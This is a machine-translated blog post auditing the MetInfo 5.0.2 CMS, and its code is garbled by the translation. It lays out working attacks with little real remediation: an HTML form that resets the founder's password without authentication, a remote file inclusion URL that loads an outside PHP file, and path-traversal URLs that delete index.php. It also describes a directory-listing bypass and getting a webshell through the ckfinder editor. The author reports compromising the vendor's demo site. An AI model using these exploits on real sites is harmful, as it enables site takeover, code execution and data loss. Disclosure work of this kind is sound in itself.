MetInfo (mi tuo) enterprise website management system 5.0.2 code audit vulnerability exploitation and repair Summary

Blog www.cnseay.com has just changed the domain name, and you need to submit an original article... I found a few CMS sets for fun... In the past, the holes dug by some programs were submitted to the official website, and some do not want to remind the official website .... Don't say anything about the gift. At least say thank you... No nonsense...

I found a brief introduction on the official website:

MetInfo enterprise website management system adopts the PHP + Mysql architecture and built-in SEO search engine optimization mechanism. It supports user-defined interface languages (various languages around the world ), has common modules of Enterprise websites (Enterprise Profile module, News Module, product module, download module, image module, recruitment module, online message, feedback system, online communication, links, websites) maps, members, and permission management ). Powerful and flexible background management functions, static page generation functions, personalized module addition functions, custom FLASH styles for different columns, and other functions can create a beautiful and marketing-oriented high-quality website for enterprises.

 

First look at the program structure

 

If install is not deleted after installation, there is a phpinfo. php (install/phpinfo. php) below. You can check the server information.

 

 

1. unauthorized password modification: Kill 2.0 to the latest version 5.0.2

The member and administrator are both in the met_admin_table table. We can see the member \ save. php file,

<? Php

Require_once '../include/common. inc. php ';

 

If ($ action = "add "){

If ($ met_memberlogin_code = 1 ){

Require_once 'captcha. class. php ';

$ Captcha = new Captcha ();

If (! $ Captcha-> CheckCode ($ code )){

Echo ("<script type = 'text/javascript '> alert (' $ lang_membercode '); window. history. back (); </script> ");

Exit;

}

}

$ Admin_if = $ db-> get_one ("SELECT * FROM $ met_admin_table WHERE admin_id = '$ yhid '");

If ($ admin_if ){

Okinfo ('javascript: history. back (); ', $ lang_js15 );

}

/* Omit the unknown number of words... */

Member permissions not verified

This feeling is good (other ones are filtered out). Let's look at the following:

 

If ($ action = "editor "){

 

$ Query = "update $ met_admin_table SET

Admin_id = '$ useid ',

Admin_name = '$ realname ',

Admin_sex = '$ sex ',

Admin_tel = '$ tel ',

Admin_modify_ip = '$ m_user_ip ',

Admin_mobile = '$ mobile ',

Admin_email = '$ email ',

Admin_qq = '$ qq ',

Admin_msn = '$ msn ',

Admin_taobao = '$ taobao ',

Admin_introduction = '$ admin_introduction ',

Admin_modify_date = '$ m_now_date ',

Companyname = '$ companyname ',

Companyaddress = '$ companyaddress ',

Companyfax = '$ companyfax ',

Companycode = '$ companycode ',

Companywebsite = '$ companywebsite '";

 

If ($ pass1 ){

$ Pass1 = md5 ($ pass1 );

$ Query. = ", admin_pass = '$ pass1 ′";

}

$ Query. = "where admin_id = '$ useid '";

$ Db-> query ($ query );

 

Nothing is filtered. Can we simply submit a form? Write an EXP

 

<Form method = "POST" name = "myform" action = "http://www.cnseay.com/member/save.php? Action = editor "target =" _ self ">

<Table cellpadding = "2" cellspacing = "1" border = "0" width = "95%" class = "table_member">

<Tr>

<Td class = "member_text"> <font color = "# FF0000"> * </font> User Name </td>

<Td colspan = "2" class = "member_input"> <input name = "useid" type = "text" class = "input" size = "20" maxlength = "20 ″

 

Value = "seay"> </td>

</Tr>

<Tr>

<Td class = "member_text"> <font color = "# FF0000"> * </font> password </td>

<Td colspan = "2" class = "member_input"> <input name = "pass1" type = "password" class = "input" size = "20 ″

 

Maxlength = "20"> </td>

</Tr>

<Td class = "member_submit"> <input type = "submit" name = "Submit" value = "submit information" class = "submit"> </td>

</Tr>

</Form>

 

Replace the content with the content saved as 1.html. Fill in the username (the Basic username is admin), enter the password you want to change to, change www.cnseay.com to the website domain name, and submit the following. The default backend address of the website is http: // domain name/admin

 

Tested the official Dome website and successfully modified the Founder's password.

 

 

There is a ckfinder editor in the background (admin \ ckfinder \ ckfinder.html here you can use shell). You can understand how to use shell in parsing holes such as IIS6.0 or Apache.

 

 

There are some changes to the upload type in the background. You know,

Modified and won the official website

Now, you can get the shell,

Fix:

In member \ save. add require_once 'login _ check to the PHP file header. php '; this does not remove the root, registration of a user login can be simply bypassed, the following is in the updete when where user_id = this ID we can use the session to obtain. Don't get it from the form...

 

Let's take a look at some other things.

 

Ii. File Inclusion Vulnerability (Version 4.0 to version 5.0.2)

Vulnerability file message/index. php

 

If (! $ Metid)

$ Metid = 'index ';

If ($ metid! = 'Index '){

 

Require_once $ metid. '. php'; // needs to be truncated

 

} Else {

/* Omitted */

}

 

If it is local, remove it. If allow_url_include = On, prepare a PHP file for remote inclusion.

Http: // 192.168.0.164: 81/MetInfo5.0/message/index. php? Metid = http: // localhost: 88/1

 

Contains the http://www.bkjia.com: 88/1. php file

 

Fix:

You should understand how to handle this. Do you need to change your code?

Iii. Arbitrary File Deletion Vulnerability

Delete 1,

There is a file management in the background

The vulnerability file is admin/system/uploadfile. php. Check the code.

 

If ($ action = 'delete '){

$ Rurls. = '& fileurl ='. $ fileurl. '& file_classnow ='. $ file_classnow. '& page ='. $ page;

If ($ action_type = "del "){

$ Allidlist = explode (',', $ allid );

$ K = count ($ allidlist)-1;

For ($ I = 0; $ I <$ k; $ I ++ ){

If (file_exists ($ allidlist [$ I]) @ unlink ($ allidlist [$ I]);

}

Metsave ($ rurls );

} Else {

If (file_exists ($ filename )){

@ Unlink ($ filename );

Metsave ($ rurls );

} Else {

Metsave ($ rurls, $ lang_setfilenourl );

}

}

If action_type is not equal to "del", the filename will be deleted. For example, if you want to delete the homepage file, you can directly access

Http://www.cnseay.com/admin/system/uploadfile.php? Filename = ../index. php & action = delete

 

Delete 2,

 

Another deletion is in the admin \ system \ database \ recovery. php file.

Let's look at the admin \ system \ database \ recovery. php file.

If ($ action = 'delete '){

If (is_array ($ filenames )){

Foreach ($ filenames as $ filename ){

If (fileext ($ filename) = 'SQL '){

@ Unlink ('../databack/'. $ filename );

}

}

} Else {

If (fileext ($ filenames) = 'SQL '){

$ Filenamearray = explode (". SQL", $ filenames );

@ Unlink ('../databack/'. $ filenames );

@ Unlink ('../databack/SQL/metinfo_'.w.filenamearray?0=.#.zip ");

} Else {

@ Unlink ('../databack/'. $ fileon. '/'. $ filenames );

}

}

// We can continue to delete the homepage file if it is marked as red.

 

Http://www.cnseay.com/admin/system/database/recovery.php? & Action = delete & filenames =.../../index. php

 

Delete 3,

 

Check the Admin/system/database/filedown. php file again. The Code is the same as the previous one, and then delete the homepage file.

 

Http://www.cnseay.com/admin/system/database/filedown.php? & Action = delete & filenames =.../../index. php

Fix:

What do you know?

Iv. directory browsing Vulnerability

The vulnerability file is admin/system/uploadfile. php. Check the code.

 

Function getDir ($ dir ){

$ FileArr = array ();

$ Dp = opendir ($ dir );

While ($ file = readdir ($ dp ))! = False ){

If ($ file! = "." AND $ file! = "..." AND $ file! = ""){

If (is_dir ($ dir. "/". $ file )){

$ FileArr = array_merge ($ fileArr, getDir ($ dir. "/". $ file ));

$ FileArr [] = $ dir. "/". $ file;

}

}

}

Closedir ($ dp );

Return $ fileArr;

}

$ Fileurl2 = $ fileurl;

$ Metnowdir = "upload"; // set the name of the directory. We can use upload/../to bypass

$ Metdirfile = getDir ('../.../'. $ metnowdir );

$ I = 0;

Foreach ($ metdirfile as $ val ){

$ Fileclassarray = explode ('/', $ val );

$ Fileclassnum = count ($ fileclassarray)-3;

$ Fileclassnum1 = count ($ fileclassarray)-1;

$ Fileclass [$ fileclassnum] [$ I] [name] = $ fileclassarray [$ fileclassnum1];

$ Fileclass [$ fileclassnum] [$ I] [url] = $ val;

$ I ++;

}

 

Okay, let's look at it again.

 

If ($ fileurl <> "") $ metnowdir = $ fileurl;

If ($ file_classnow = 3 ){

$ Fileurl1 = explode ('/', $ fileurl );

$ Fileurl = $ fileurl1 [0]. '/'. $ fileurl1 [1];

}

$ Metdir = new myDIR;

$ Metdir-> setMASK ("*. gif ,*. txt ,*. jpg *,*. rar *,*. jpeg *,*. doc *,*. pdf *,*. bmp *,*. png *,*. tif *,*. psd *,*. swf *,*. swf *");

$ Metdir-> setFIND ("files ");

.... /// Omitted

 

Set the file extension for browsing... Only .gif ,*. txt ,*. jpg *,*. rar *,*. jpeg *,*. doc *,*. pdf *,*. bmp *,*. png *,*. tif *,*. psd *,*. swf *,*. swf * the file with the extension above is a pain point.

 

Http://www.cnseay.com/admin/system/uploadfile.php? Anyid = & lang = cn & fileurl = upload /../

 

You can browse the files in the directory,

Fix:

You should know better than me...

 

Not a small suggestion for a Vulnerability

When I log onto the background, there is a problem.

Right-click the source code after login, And the administrator password is directly in it... I want to verify the permission, but there is actually a better way ....

 

Now, let's see it. This document has been submitted to the official website and will notify the official website to fix the vulnerability. You are welcome to visit our blog at http://www.cnseay.com/. please reserve your record and thank you.

By: seayblog: http://www.cnseay.com/